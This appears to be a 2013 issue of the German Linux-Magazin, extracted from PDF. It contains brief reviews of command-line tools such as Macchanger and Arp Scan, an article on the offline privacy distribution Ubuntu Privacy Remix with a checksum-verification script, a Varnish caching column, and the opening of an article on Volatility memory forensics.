01 cd /media/stick
02 git clone ~/annex
03 cd annex
04 git annex init "USB‐Stick"
05 git remote add pc ~/annex
06 cd ~/annex
07 git remote add usb‐stick /media/stick/annex
Listing 2: Dateien hinzufügen
01 cd ~/annex
02 cp /tmp/Datei1 .
03 cp /tmp/Datei2 .
04 git annex add .
05 git commit ‐a ‐m 'neue Dateien'

Software
www.linux-magazin.de Tooltipps 11/2013
60
Werkzeuge im Kurztest
Tooltipps
Macchanger 1.6.0
MAC-Adresse manipulieren
Quelle: [https:// github. com/ alobbs/​
macchanger]
Lizenz: GPLv3
Alternativen: Ifconfig, Ip
Codesh 2.0.1
Shellsessions mitschneiden
Quelle: [http:// sourceforge. net/ projects/​
codesh]
Lizenz: GPLv2
Alternativen: Script
Enc 0.2
Enc-FS bequem verwalten
Quelle: [https:// bitbucket. org/ erlcash/ enc]
Lizenz: GPLv3
Alternativen: Gnome Enc-FS-Manager
Die 48 Bit lange MAC-Adresse vergibt
der Hardwarehersteller; sie ist weltweit
eindeutig. Das Tool Macchanger erlaubt
es Anwendern, die Hardware-Adresse bis
zum nächsten Bootvorgang zu verändern
und beispielsweise eine MAC eines anderen
Herstellers zuzuweisen.
Mit »‐s Interface« aufgerufen gibt das Tool
die MAC-Adresse der Schnittstelle aus.
Dabei unterscheidet es zwischen der momentan
gesetzten (»Current MAC«) und
der in der Hardware verankerten Adresse
(»Permanent MAC«), im Normalfall sind
beide identisch. Zum Verändern bietet
Macchanger mehrere Optionen. So sorgt
»‐e« dafür, dass das Tool eine Adresse
desselben Herstellers erhält, »‐a« setzt zusätzlich
denselben Typ. Eine Liste aller
bekannten Hersteller gibt der Parameter
»‐l« aus.
Der Schalter »‐r« wählt eine Adresse nach
dem Zufallsprinzip aus. Wer hingegen
eine ganz bestimmte MAC-Adresse benötigt,
um etwa DHCP- oder Firewall-Einstellungen
zu testen, der setzt diese mit
»‐m«. Um die Änderungen auszuführen,
brauchen Anwender Rootrechte und das
Interface darf nicht aktiv sein.
★★★★★ Macchanger ist ein nützliches
Werkzeug zum Manipulieren von MAC-
Adressen, was insbesondere dann hilfreich
ist, wenn Benutzer MAC-sensitive
Konfigurationen testen müssen. n
Codesh (Collaborative Development Shell)
ist eine intelligente Shell für Anwender,
Sysadmins und Entwickler, sie speichert
alle Benutzereingaben, Meldungen von
Skripten und Programmen, Änderungen
an Variablen sowie Aliasdefinitionen einer
Session. Seine Aufzeichnungen legt
das Python-Tool in einem lokalen CVS-,
Subversion- oder Ascii-Repository ab. Die
Ablage umfasst jeweils die Logs der Shellsitzung
und Snapshots, welche die vollständige
Verzeichnisstruktur ausgehend
vom Arbeitsordner enthalten.
Vor dem ersten Codesh-Einsatz erstellen
Nutzer zuerst ein Repository und nehmen
dazu eines der drei enthaltenen Shellskripte
zur Hilfe. Ist der Verwahrungsort
definiert, dann setzt »codesh_init.sh« die
Pfade und Umgebungsvariablen entsprechend.
Jetzt ist das Python-Programm
»codesh.py« an der Reihe. Anwender
passen beim Aufruf die Codesh-Konfiguration
an oder übernehmen die Standardeinstellungen.
Danach verhält sich Codesh wie viele andere
Umgebungen. Über »?« geben Nutzer
eine Liste aller Befehle aus, [Strg]+[D]
beendet die Sitzung.
★★★★★ Codesh protokolliert zuverlässig
Shellsitzungen und bewahrt sie in
Repositories auf. So erreichen Anwender
jederzeit alte Sessions und reproduzieren
bestimmte Arbeitsschritte.
n
Enc-FS baut auf dem Fuse-Framework
auf und verschlüsselt keine ganzen Dateisysteme,
sondern einzelne Verzeichnisse.
Das Shellskript Enc unterstützt Anwender
dabei auf der Kommandozeile; Voraussetzung
sind Enc-FS und »encfsctl«
ab Version 1.7.4.
Die verschlüsselten Daten verwaltet Enc
in so genannten Stashes. Deren Bezeichner
müssen eindeutig sein; sie sind jeweils
einem Verzeichnis zugeordnet. Mit
dem Kommando »enc add«, gefolgt vom
Stash-Namen und dem Ordner, erstellt
das Tool einen neuen. Danach ruft der Benutzer
»enc« zusammen mit dem Stash-
Namen auf und gibt ein Passwort für das
verschlüsselte Verzeichnis an. Weitere
Optionen hängen existierende Stashes
ins Dateisystem ein und wieder aus, ändern
das Kennwort und komprimieren die
verschlüsselten Daten. Ohne Parameter
aufgerufen listet Enc alle Optionen und
die konfigurierten Stashes auf.
Enc bietet die Modi Standard, Paranoid
und Experte an. Während letzterer alle
Einstellungen detailliert abfragt (AES-
Schlüssellänge, Blockgröße und so weiter),
unterscheiden sich Standard und
Paranoid vor allem durch die verwendete
Schlüsselgröße (192 versus 256 Bit).
★★★★★ Enc ist noch ein junges Projekt,
bietet aber jetzt schon alle wichtigen
Funktionen zum Verwalten von Enc-FS-
Verzeichnissen.
n

Software
www.linux-magazin.de Tooltipps 11/2013
62
Arp Scan 1.9
Nach MAC-Adressen scannen
Quelle: [https:// github. com/ royhills/​
arp‐scan]
Lizenz: GPLv3
Alternativen: Arping, Arp Tools
Palaver (August 2013)
Spracherkennung und ‐steuerung
Quelle: [https:// github. com/ JamezQ/​
Palaver]
Lizenz: GPLv3
Alternativen: Blather, Simon
Cyberprobe 0.20
Netzwerke verteilt überwachen
Quelle: [http:// cyberprobe. sourceforge. net]
Lizenz: GPLv3
Alternativen: Dabba
Netzwerkscanner stellen fest, welche
Dienste oder Rechner sich in einem
Netzwerk befinden und welche davon
erreichbar sind. Die meisten dieser Tools
arbeiten auf IP-Basis und damit auf OSI-
Level 3. Arp Scan nutzt Level 2, sendet
ARP-Anfragen zu den Zielen und erfordert
daher Rootrechte. ARP ist auf IPv4
beschränkt, IPv6 nutzt NDP.
Anwender rufen das Tool zusammen mit
der IP-Adresse des Zielrechners auf und
erhalten als Antwort die MAC-Adresse,
den Netzwerkkarten-Hersteller und eine
Auskunft, wie viele Pakete unterwegs
verloren gingen. Optional nimmt »‐‐file«
eine Datei mit einer Liste von Zielen entgegen.
In Kombination mit »‐‐random«
arbeitet Arp Scan die Aufstellung nach
dem Zufallsprinzip ab.
Wer nur das lokale Netz scannen möchte,
der verwendet »‐‐localnet«. Mit »‐‐retry«
legt man fest, wie oft das Tool einen
Rechner prüft. Die Parameter »‐‐timeout«
und »‐‐bandwith« bestimmen, wann ein
Scanversuch als erfolglos gilt oder wie
viel Bandbreite Arp Scan nutzt.
Zusätzlich enthalten die Quellen das
Werkzeug »arp‐fingerprint«, das Anwender
ebenfalls zusammen mit einer
IP-Adresse aufrufen. Es prüft mit einer
Reihe von ARP-Paketen das Verhalten des
Zielrechners und versucht diesen anhand
eines Fingerprints zu identifizieren. Da
einige Betriebssysteme einen identischen
Fingerprint haben, ist das Ergebnis allerdings
nicht ganz genau.
★★★★★ Wer mit den ARP-Einstellungen
experimentieren und sein Netzwerk austesten
möchte, der sollte Arp Scan eine
Chance geben. Manpage und Wiki liefern
zahlreiche Anregungen.
n
Die Sprachsteuerung mit dem schönen
Namen Palaver lauscht am Mikrofoneingang
und sendet das aufgenommene
Audiomaterial an Googles Speech-API,
das für die Spracherkennung zuständig
ist. Das Python-Tool setzt daher eine Internetverbindung
und das Vertrauen in
den Suchmaschinenbetreiber voraus. Um
Palaver zu starten, übersetzt der Anwender
zunächst mit »./setup« eine native
C-Bibliothek. Danach legt er in den Tastatur-Einstellungen
einen Shortcut fest,
der das Skript »hotkey« aufruft.
Den zurückgelieferten Text interpretiert
es als Befehl. So öffnet beispielsweise
»goto google« die Google-Homepage im
Browser. Beginnt der Befehl mit »type«,
fügt Palaver die nachfolgend gesprochenen
Wörter als Text in das gerade geöffnete
Programm ein. Da diese jedoch
immer erst nach der Analyse auf dem
Bildschirm erscheinen, taugt das Tool nur
zur Eingabe von kurzen Texten. Im Unterverzeichnis
»Recognition/bin« liegen
für alle bekannten Sprachkommandos
passende Shellskripte, die den Befehl
umsetzen.
Derzeit erkennt das Tool nur englische
Wörter und Kommandos. Um eine optimale
Zusammenarbeit zu erreichen,
muss das Mikrofon die Sprache unverzerrt
wiedergeben. Anwender sollten darüber
hinaus deutlich und möglichst ohne
Dialekt sprechen. Mit Plugins können
Programmierer Palaver um zusätzliche
Funktionen erweitern. Zukünftig sollen
auch Benutzer eigene Befehle hinzufügen
dürfen.
★★★★★ Palaver merkt man sein junges
Entwicklungsstadium an. Wer Google
vertraut, der kann mit dem Tool aber
schon jetzt kurze Texte einsprechen und
schnell Befehle übermitteln. n
Ursprünglich als Analysetool für Netzwerk-Applikationen
geplant, eignet sich
Cyberprobe inzwischen ebenfalls dazu,
Netzwerkstrukturen zu überwachen. Anwender
setzen das Programm verteilt auf
belie bigen Systemen ein. Die erfassten
Daten leitet es an eine zentrale Stelle
weiter.
Die Konfiguration erfolgt im XML-Format;
eine Einrichtungsdatei im Quellarchiv
kann als eigene Vorlage dienen. Im
»interface«-Block definiert der Anwender,
welche Schnittstellen das Tool überwacht.
Im Bereich »target« stehen die
IP-Adressen von Hosts, deren Datenverkehr
Cyberprobe mitschneiden soll; die
Angabe voll qualifizierter Domainnamen
(FQDN) ist hier nicht möglich.
Zur Weiterbearbeitung reicht das Tool
die gesammelten Daten an ein externes
Programm wie Tcpdump weiter. Das darf
auch auf einem entfernten System passieren.
Dazu legt der Nutzer im »endpoint«-
Block ein Zielsystem fest und gibt dazu
die Adresse, den Port und das Übertragungsprotokoll
an.
Wer möchte, der erweitert die Konfiguration
um einen »control«-Abschnitt,
der administrativen Telnet-Zugriff auf
Cyberprobe und Anpassungen während
des Betriebs erlaubt. Wahlweise ist eine
Interaktion mit dem IDS-Tool Snort möglich.
Das Quick-Start-Tutorial auf der Projektseite
enthält einige gut kommentierte
Konfigurationsbeispiele.
★★★★★ Cyberprobe eignet sich gut
dazu, die Netzwerkstruktur im Auge
zu behalten. Neuere Versionen enthalten
eine LUA-Schnittstelle. Auf dem
Testsystem (Ubuntu 13.04) verweigerte
diese jedoch den Dienst. (U. Vollbracht,
T. Schürmann/​hej) n

Software
www.linux-magazin.de Ubuntu Privacy Remix 11/2013
64
Ubuntu für Sicherheitsbewusste
Erlösende Einsamkeit
Um den Rechner vor Spionen und Kriminellen zu schützen, bricht Ubuntu Privacy Remix alle Brücken ins Internet
ab und verwandelt den Computer in eine Insel der Sicherheit. Wer zurück in die Zivilisation will, dem
dienen ein USB-Stick und etwas Geduld als Floß. Kristian Kißling
strahlung von Monitoren. Auch das passt
zu Bruce Schneiers Feststellung [1]: „Was
ich beim Lesen der Snowden-Dokumente
lernte ist: Wenn die NSA auf eure Rechner
will, kommt sie auch drauf. Punkt.“
Feature Count
© Iakov Kalinin, 123RF.com
Das Ausmaß der weltweiten Überwachung
schockt selbst erfahrenere Paranoiker.
Doch was tun, um besonders sensible
Daten zu schützen? Den Aufwand für die
Geheimdienste so teuer wie möglich machen,
empfiehlt Security-Experte Bruce
Schneier [1]. Der Tipp hilft natürlich auch
gegen Angreifer mit kriminellen Interessen,
die ebenso eine Menge Geschick an
den Tag legen können, um an die Daten
fremder Rechner zu gelangen.
Gegen beide Gruppen stellt sich Ubuntu
Privacy Remix (UPR, [2]), dessen Feature-Beschreibungen
noch vor einigen
Monaten bei breiten Teilen der Computernutzer
für viel Heiterkeit gesorgt
hätten: kein Zugang zum Internet, keine
Installationsmöglichkeit und auch kein
Zugriff auf die Festplatte!
Schaut man sich das seit 2008 existierende
Projekt heute an, kommt einem
vieles gar nicht mehr so absurd vor.
Denn was hilft Festplattenverschlüsselung,
wenn die Spyware auf diversen
Routen, über Downloads, Zero-Day-Exploits
oder Router-Backdoors auf dem
Rechner landet? Ohne Schreibzugriff auf
die Festplatte lässt sich Malware schon
mal bedeutend schwerer installieren, der
fehlende Internetzugang tut ein Übriges.
Um dennoch Dateien zu speichern, bietet
Ubuntu Privacy Remix 12.04, das sich
aktuell noch im Betastadium befindet,
eine USB-Stick-Lösung auf Basis von
True crypt [3] an.
Die Macher der Distribution behaupten
nicht, dass ihr System alle Security-
Probleme löst: Zu den Risikoszenarien
zählen sie manipulierte Hardware, auf
der von UPR unbemerkt ein Hypervisor
oder Hardware-Keylogger läuft. Die Installation
würde immerhin physischen
Zugriff auf den Rechner erfordern. Hat
der Angreifer den Speicherstick, könnte
er auch schwache Passwörter von Truecrypt-Containern
ausnutzen.
Vor allem aber hilft UPR nicht gegen Angriffe,
die mit IT eher wenig zu tun haben:
versteckte Kameras, das Abhören von
Funktastaturen und Auslesen der Aus-
Ohne Internetzugang und Festplattenzugriff
werden einfache Dinge kompliziert:
UPR wird standardmäßig auf eine DVD
gebrannt und im Live-Betrieb genutzt
und lässt sich daher nicht ohne Weiteres
erweitern, etwa um neue Software. Wer
mit dem Software-Angebot von Ubuntu
Privacy Remix nicht zufrieden ist, muss
sich seine Version selbst basteln. Das Projekt
bietet Hilfestellung, indem es eine
entsprechende Vorlage auf der Webseite
anbietet [4]. Das Mastern einer eigenen
UPR-Version erfordert aber einen nicht
geringen zeitlichen Aufwand.
Doch das Basissystem bringt schon eine
Menge nützlicher Tools mit. Die aktuelle
Beta stützt sich auf Ubuntu 12.04.2
UPR auf USB-Stick
Dem Anfertigen eines bootbaren USB-Sticks
stellten sich im Test kleine Hindernisse in den
Weg. Ubuntus Startmedien-Ersteller versagte
gegen Ende mit einer Fehlermeldung, was
sich wohl auf einen Bug in der Software zurückführen
lässt. Unetbootin erzeugte zwar
ein bootfähiges System, jedoch mit eigenem
Bootmenü. Hier fanden die Tester keine Möglichkeit,
Keyboard und Benutzeroberfläche
auf Deutsch zu lokalisieren, was die Arbeit
mit dem Betriebssystem deutlich erschwert
hätte. Erst der simple Zweizeiler
dd if=upr‐12.04r1beta1.iso of=/dev/sdX U
bs=512K
sync
führte zum Ziel, der Stick ließ sich booten.

Abbildung 1: Mit Hilfe eines Skripts lassen sich die Checksummen der Dateien von UPR überprüfen.
LTS mit Gnome-Classic-Desktop und
Kernel 3.5. Abweichend vom Sortiment
des regulären Ubuntu 12.04 nimmt UPR
12.04rc1 Libre Office 4.0 ebenso an Bord
wie Scribus 1.4.2. Die fertige Version soll
dann auf Ubuntu 12.04.3 basieren und
den Kernel in Version 3.8, Gimp 2.8 sowie
Libre Office 4.1 mitbringen.
Sammeln sich viele Daten im erweiterten
Truecrypt-Container, soll zudem ein
neues Suchwerkzeug das bislang eingesetzte
Beagle ablösen, um dessen Inhalte
zu durchforsten. Weitere Passagiere sind
die Sammlungsverwaltung Tellico, der
Mind-Mapper Vym, die Projektverwaltung
Planner, der Videoplayer Totem, die
Brennsoftware Brasero, Virtualbox und
noch einige nützliche Tools mehr.
Um gegen Versuche vorzugehen, den Arbeitsspeicher
auszulesen, will das Projekt
die Memory-Erasure-Funktion aus
dem Tails-Projekt [5] übernehmen. Die
löscht beim Herunterfahren mit Hilfe von
»sdmem« den größtmöglichen Teil der
Daten im Arbeitsspeicher und verhindert
so Cold-Boot-Angriffe, in deren Verlauf
der Arbeitsspeicher tiefgekühlt und nachträglich
ausgelesen wird.
Bootstrap
Zunächst gilt es, über eine HTTPS-Verbindung
eine nicht kompromittierte Version
des Image [6] sowie eine zugehörige
Signaturdatei herunterzuladen. Das
Image ist mit dem PGP-Schlüssel von
Mark Preetorius, dem Hauptentwickler
des Projekts, signiert. Seine Unversehrtheit
lässt sich überprüfen mit:
gpg ‐‐verify upr‐12.04r1beta1.iso.sig U
upr‐12.04r1beta1.iso
Listing 1: »md5.sh«
01 #!/bin/bash
02
03 # Pfad zur DVD/USB‐Stick
04 datapath=/media/user/UPR_12.04r1
05 # Pfad zur Datei mit den MD5‐Summen
06 md5datapath=/media/user/UPR_12.04r1/md5sum.txt
07
08 data=$(grep "./*" ${md5datapath} | cut ‐d " "
‐f 3)
09
Meist genügt ein Brennprogramm wie
Brasero oder K3b, um das Image auf eine
DVD zu brennen. Wer einen USB-Stick
verwenden möchte, büßt einen der Vorteile
ein: Ein Stick ist beschreibbar und
lässt sich so manipulieren. Einige Sticks
bieten zumindest die Möglichkeit, über
einen Hardwareschalter einen Schreibschutz
zu aktivieren, was der Ersteller
nach dem Aufspielen des Image (siehe
Kasten „UPR auf USB-Stick“) tun sollte.
Vom Einsatz von SD-Karten raten die Entwickler
ab, da der Schreibschutz nicht
zuverlässig greife.
Wer sichergehen will, dass die Dateien
auf dem USB-Stick nicht manipuliert
wurden, kann die im ISO selbst befindlichen
MD5- und SHA1-Summen überprüfen.
Eine Liste dieser Prüfsummen
befindet sich im Wurzelverzeichnis der
gebrannten DVD beziehungsweise des
USB-Sticks. Das einfach gestrickte Skript
aus Listing 1 extrahiert aus der Checksummendatei
im Wurzelverzeichnis
(»${md5datapath}«) zunächst die Pfade
zu den einzelnen Dateien.
Die For-Schleife bildet für alle Dateien
in den Pfaden von »${data}« die MD5-
Checksumme und schreibt die Ergebnisse
in die neue Datei »md5sum_new.txt«.
Sed entfernt den »${datapath}« aus allen
Pfadangaben der neu erzeugten Datei.
Letztere sollte nun der Datei »/media/
work/UPR_12.04r1/md5sum.txt« aufs
Haar gleichen – es sei denn, die Checksummen
stimmen nicht überein. Um das
zu prüfen, läuft am Ende des Skripts ein
Diff über beide Dateien und gibt im Erfolgsfall
die Meldung aus Abbildung 1
aus. Mit ein paar Anpassungen lässt sich
das gleiche Spielchen mit der »sha1sum.
txt«-Datei wiederholen.
Das alles hilft wenig, wenn das ganze
Image durch eine manipulierte Variante
ersetzt wurde. Daher sind auch die Dateien
»md5sum.txt« und »sha1sum.txt«,
10 for i in $data; do
11 md5sum ${datapath}/$i >> ./md5sum_new.txt
12 done
13
14 sed ‐i 's/\/media\/user\/UPR_12\.04r1\///g'
./md5sum_new.txt
15
16 diff ‐s md5sum_new.txt ${md5datapath}
17 rm ./md5sum_new.txt
Ubuntu Privacy Remix 11/2013
Software
www.linux-magazin.de
65

Software
www.linux-magazin.de Ubuntu Privacy Remix 11/2013
66
die die Checksummen auflisten, signiert
und lassen sich aus dem Wurzelverzeichnis
von UPR heraus über den Public Key
des Hauptentwicklers verifizieren:
gpg ‐‐verify sha1sum.txt.sig sha1sum.txt
gpg ‐‐verify md5sum.txt.sig md5sum.txt
Über den Fingerprint und eine Internetrecherche
kann der Nutzer den Schlüssel
des Entwicklers verifizieren.
Datentresor
Im Bootmenü von Ubuntu Privacy Remix
– über [Esc] zu erreichen – gilt es
nun, sich per [F3] zunächst für eine
Sprache zu entscheiden. Standardmäßig
erhält der Nutzer keine Rootrechte, kann
sich diese aber zusichern, indem er [F6]
drückt und die Kerneloption »godmode«
ergänzt (Abbildung 2). Der Befehl »sudo
su« beschert dem Nutzer dann Rootrechte
ohne eine Passworteingabe.
Wer Daten speichern will, braucht jedoch
keine Rootrechte, er muss vielmehr
als Nächstes einen erweiterten Truecrypt-Container
auf einem zweiten USB-
Stick anlegen. Dazu ruft der Nutzer den
Menüpunkt »Anwendungen | Sicherheit |
Truecrypt‐Container Assistent« auf, setzt
ein Häkchen bei »Einen erweiterten Container
erzeugen« und wählt dann »Eine
Container‐Datei erzeugen«.
Im nächsten Fenster klickt der Truecrypt-
Nutzer in der Zeile »Container‐Datei«
auf »Suchen« und wählt den USB-Stick
aus, der den Container aufnehmen soll.
Dessen Größe hängt vom Platz auf dem
Stick ab, der Benutzer sollte sie großzügig
wählen, weil hier alle Dateien landen, die
er von UPR speichern möchte.
Nach der Auswahl eines Namens sowie
einer Passwortfestlegung (20 Zeichen)
muss der Nutzer noch eine Minute lang
mit Mausbewegungen Zufallszahlen erzeugen,
um dann auf »Generieren« zu klicken
und die Erfolgsmeldung abzuwarten.
Das Passwort sollte sehr sicher sein,
da Ubuntu Privacy Remix es verschlüsselt
auf dem USB-Stick ablegt.
Um den erweiterten Container zu nutzen,
ruft der Anwender den Dateimanager
auf, klickt den Container mit der
rechten Maustaste an und wählt »True-
Crypt‐Container | Öffnen«. Nach Eingabe
des Passworts erscheint der Container
einsatzbereit auf dem Desktop.
Doch nicht nur das:
Automatisch legt UPR
auch die Konfigurationen
diverser Programme
über Links
aus dem Homeverzeichnis
in dem Container
ab. So lassen
sich Libre Office &
Co. einrichten, ohne
die User-Einstellungen
ständig wieder zu
verlieren. Voraussetzung
ist, dass der Anwender
den Container
vor dem Start der Programme öffnet. Um
den Container vor dem Herunterfahren
auszuhängen, genügt ein Rechtsklick
auf das Desktop-Icon mit der Auswahl
»Truecrypt‐Container | Aushängen«.
Einsame Insel
Ubuntu Privacy Remix
Auf der DELUG-DVD dieses Magazins
finden Sie ein 1,2 GByte großes Image
DELUG-DVD
der ersten Betaversion von Ubuntu Privacy Remix
12.04r1, einem Ubuntu-Derivat mit Fokus
auf Privatsphäre. Der Artikel beschreibt, wie
sich mit dem Image arbeiten lässt.
Abbildung 2: Im Bootmenü lässt sich die Sprache von UPR ändern, die
»godmode«-Option verschafft dem Nutzer Rootrechte.
Ubuntu Privacy Remix ist die einsame
Insel unter den Distributionen. Isoliert
von der Außenwelt ist sie vor Angriffen
gut geschützt, aber im Privatbereich
auf Dauer nur für Robinsons geeignet.
Ist die fehlende Festplatte aufgrund der
verschlüsselten USB-Lösung noch zu verschmerzen,
erschwert der fehlende Internetzugang
eine normale Kommunikation
mit der Außenwelt doch stark.
Eine Lösung besteht darin, einen weiteren
USB-Stick zu nutzen, auf dem ein
Live-System mit Internetzugang läuft,
oder gleich einen zweiten Rechner. Für
die Vorgängerversion 10.04r3 von UPR
gibt es eine Dualboot-DVD, die zum anonymen
Surfen die Tor-Distribution Tails
anbietet, was eine Teillösung ist.
Die eher kleine Gruppe von Menschen,
die sensible Daten verwaltet, ohne dafür
eine besondere Software oder das
Internet zu benötigen, dürfte mit UPR
hingegen gut bedient sein. Etwa der anfangs
erwähnte Security-Forscher Bruce
Schneier, der eine ähnliche Lösung verwendet
[1]: „Wenn ich eine Datei transferieren
möchte, verschlüssele ich sie auf
dem sicheren Rechner und bringe sie auf
meinem USB-Stick auf meinen Rechner
mit Internetzugang.“ Bewaffnet mit zwei
USB-Sticks macht es keinen Unterschied,
auf welchem Rechner der Nutzer arbeitet.
Verseuchte Dokumente lassen sich
gelassen betrachten, weil die Malware
nicht auf die Festplatte kommt.
Auch für kleinere Firmen könnte sich
der Einsatz von UPR lohnen, wenn sie
keine spezielle Software benötigen und
die Programme keine Datensätze aus einem
CRM oder einer Groupware ziehen,
wie es in Firmen häufig geschieht. Kundendatensätze
inklusive Kreditkarteninformationen
werden heute zwar über das
Internet eingesammelt, ließen sich dann
aber splitten: Die sensiblen Daten müsste
ein Rechner ohne Internetanschluss sicher
verwalten, während die Daten zur
Kommunikation auf Rechnern und Servern
mit Netzwerkzugriff blieben. Auch
Abrechnungen, betriebliche Kostenrechnungen
oder Strategieplanungen ließen
sich auf so einem Rechner verwalten. n
Infos
[1] Bruce Schneier: [http:// www. theguardian.​
com/ world/ 2013/ sep/ 05/ nsa‐how‐to
‐remain‐secure‐surveillance]
[2] Ubuntu Privacy Remix:
[https:// www. privacy‐cd. org]
[3] Truecrypt: [http:// www. truecrypt. org]
[4] UPR selbst mastern:
[https:// www. privacy‐cd. org/ de/​
anleitungen/ demo‐content‐mainmenu‐56]
[5] Tails: [https:// tails. boum. org]
[6] Download von UPR:
[https:// www. privacy‐cd. org/ de/​
upr‐auf‐launchpad/ download]

Aus dem Alltag eines Sysadmin: Varnish
Slow Food
Einführung 11/2013
Sysadmin
Sysadmin-Kolumnist Charly hat in diesem Monat den Salat und lässt deswegen ein angebotenes Steak zurückgehen.
Alles klar? Herr Kühnast und ein tattriger Häuptling bitten zu Tisch. Charly Kühnast
Inhalt
68 Volatility 2.3
Der Memory-Dump-Analyzer liefert
forensische Informationen aus Linux-
Systemen.
74 Open Nebula erweitern
Wie Virtualisierungsanwender eigene
Shellskripte an Hooks einklicken.
„Salat schmeckt wesentlich besser, wenn
man ihn kurz vor dem Verzehr durch
ein saftiges Steak ersetzt“ – solche Substitutionssprüche
sterben trotz ihres homöopathischen
Komikgehalts nicht aus.
Auch Admins bekommen derart gestaltete
Tipps: „Apache liefert statische Inhalte
wesentlich schneller aus, wenn man ihn
kurz vor dem Start durch Nginx ersetzt“.
Der Spruch mag Vegetarier nicht mehr
erregen, versetzt aber die Augen mancher
Serveradmins in Kreisbewegung. Auch
meine.
Ich soll nämlich gerade einen Apache 2.2,
der fast nur statischen Content auswirft,
auf Maximalleistung trimmen. Aus mehreren
Gründen darf ich dabei den alten
Indianer nicht in die Wüste schicken, der
zwar der unangefochtene Häuptling der
Flexibilität ist, aber in Sachen Performance
die Verfolgung seiner Widersache gar
nicht mehr aufzunehmen braucht.
Aber wenn ich dem Apachen nicht den
Garaus machen darf, möchte ich ihn zumindest
auf ein flotteres Pferd setzen,
Abbildung 1: Als reiner Apache-Beschleuniger reicht
Vanish eine derartig simple Konfiguration.
etwa durch einen flotten Cache wie Varnish
[1]. Die Macher des Tools haben
es von Grund auf als Caching-Instanz
konzipiert, entsprechend mächtig fällt es
aus. Ich könnte in der eigens dafür vorgesehenen
Varnish Cache Language (VCL)
komplexe Regelwerke entwerfen, für das
Puffern statischer Webseiten reicht mir
aber schon eine schlanke Konfiguration.
Zunächst baue ich den Apache per »NameVirtualHost«
und »Listen« so um, dass
er künftig auf Port 8080 statt Port 80
lauscht, denn den soll Varnish übernehmen.
Sein Cache wird dann Inhalte direkt
an den Client weiterreichen.
Die meisten Distributionen haben Varnish
an Bord. Debian und seine Derivate
konfigurieren Varnish über die Datei »/
etc/default/varnish«, Red Hat und Verwandte
in »/etc/sysconfig/varnish«. Ich
muss hier lediglich die Kommandozeilenparameter
für den Startaufruf anpassen
(»DAEMON_OPTS«). Abbildung 1 zeigt
die Konfiguration, die ich für meinen
Apache-Beschleuniger benutze. Mit »‐a
:80« lege ich fest, dass Varnish auf allen
IPv4- und IPv6-Adressen des Systems
Verbindungen zu Port 80 entgegennimmt.
Der Parameter »‐b« verrät Varnish, wo der
Apache sein Zelt aufgeschlagen hat.
Ein laufender Varnish lässt sich über ein
Telnet-Interface steuern, dessen Adresse
und Port ich mit »‐T« angebe. Wegen der
Sicherheit öffne ich den Port nur auf »localhost«,
außerdem muss ich das Secret
kennen, das in der Datei nach dem Parameter
»‐S« abgelegt ist. Hinter »‐u« und
»‐g« verbergen sich erwartungsgemäß Benutzername
und Gruppenzugehörigkeit.
Cache and Carry
Für die Performance ist die letzte Zeile
mit dem Parameter »‐s« die wichtigste,
denn sie steuert Art und Größe des
Caches. Den Cache kann ich im RAM
oder auf einer Plattenpartition anlegen.
Gebe ich hier
file, /var/cache/varnish.cache,50%
an, so benutzt Varnish den unter »/var/
cache« bereitstehenden Plattenspeicher
bis zur Hälfte. Dabei belegt das Tool den
Platz nicht sofort, sondern die Cachedatei
wächst erst nach und nach.
Kalte Platte
Allerdings sollte niemand von einem Plattencache
Wunder erwarten. Mein Ser ver
ver fügt zum Glück über 16 GByte RAM:
Apache und Varnish nehmen sich davon
ein Stückchen, aber 10 GByte darf ich dem
Cache locker überantworten. Wäre ich zu
knauserig, weicht Varnish ins Swap aus,
und der Geschwindigkeitsvorteil ist hin.
Ergo: »‐s malloc,10g«, und der alte Indianer
galoppiert wie ein junger. (jk) n
Infos
[1] Varnish: [http:// www. varnish‐cache. org]
Der Autor
Charly Kühnast administriert
Unix-Syste me im Rechenzentrum
Niederrhein. Zu seinen
Aufgaben gehören Sicherheit
und Verfügbarkeit der
Firewalls und der DMZ.
© ginasanders, 123RF.com
www.linux-magazin.de
67

Sysadmin
www.linux-magazin.de Volatility 2.3 11/2013
68
Der Memory-Dump-Analyzer Volatility liefert Informationen aus Linux-Systemen
Flüchtige Spuren
Spurensuche im RAM, das ist die Domäne von Volatility. Das Forensiker-Werkzeug hilft Admins dabei, zu analysieren,
was auf einem System schiefgelaufen ist. Für Rückschlüsse auf Malware, laufende oder gar kompromittierte
Dienste reicht ihm meist ein Abbild des Arbeitsspeichers. Markus Feilner, Hans-Peter Merkel
platte einen Totalschaden hatte oder ein
gerissener Einbrecher seine Spuren zwar
nicht auf der Disk, doch vielleicht im
laufenden System hinterlassen hat.
Üben für den Ernstfall
© spleen87, photocase.com
Dass Informationen aus dem Arbeitsspeicher
eines Rechners auch nach dem
Unterbrechen der Stromversorgung noch
einige Zeit erhalten bleiben, ist ein offenes
Geheimnis [1]. Einfacher noch liegt
der Fall beim Betätigen des Reset-Buttons,
weil bei diesem ja die Spannung
nicht einmal unterbricht. Wer dann beim
Reboot ein minimales Betriebssystem –
etwa per USB-Stick – heranzieht, dem
stehen große Teile des Arbeitsspeichers
noch unverändert zur Verfügung, fast so,
als hätte er Vollzugriff auf das vorher
laufende System.
Strings und Grep
Jetzt ließe sich schon mit Linux-Bordmitteln
wie Strings und Grep einiges herausfinden,
doch mit einem ausgewachsenen
Memory-Dump-Analyzer wie Volatility
[2] geht noch viel mehr – und das Open-
Source-Projekt entwickelt sich kontinuierlich
weiter.
Als sich das Linux-Magazin zuletzt 2008
dem Memory-Analyzer widmete, konnte
das Framework nur RAM-Abbilder von
Windows-Maschinen analysieren [3], als
PDF auf der DELUG-DVD). Seit Version
2.2 beherrscht es aber auch Linux, ab
der anstehenden 2.3 sind auch Apple-
Geräte und Androiden zur Auswertung
freigegeben. Doch vor allem Linux-Admins
dürfen sich über eine große Anzahl
neuer Tools und Programme freuen, die
viele Informationen aus vermeintlich toten
– oder auch fremden – Maschinen
extrahieren können.
Volatility erweist sich primär für jene als
nützlich, die herausfinden wollen oder
schlimmstenfalls müssen, was ein Rechner
getan hat, als beispielsweise die Fest-
Tools wie Lime [4] helfen solch ein Abbild
aus einem laufenden System anzufertigen,
ehe vielleicht ein Reboot oder
schon das Herunterfahren oder Anhalten
der Maschine die Spuren verwischt. Für
Admins, die den Umgang mit Volatility
lernen, haben die Projektmitglieder jede
Menge Memory Dumps [5] zu Übungszwecken
zur Verfügung gestellt, wer eigene
Images erstellen will, kann das auch
mit einem USB-Stick.
Wer die im Folgenden beschriebenen
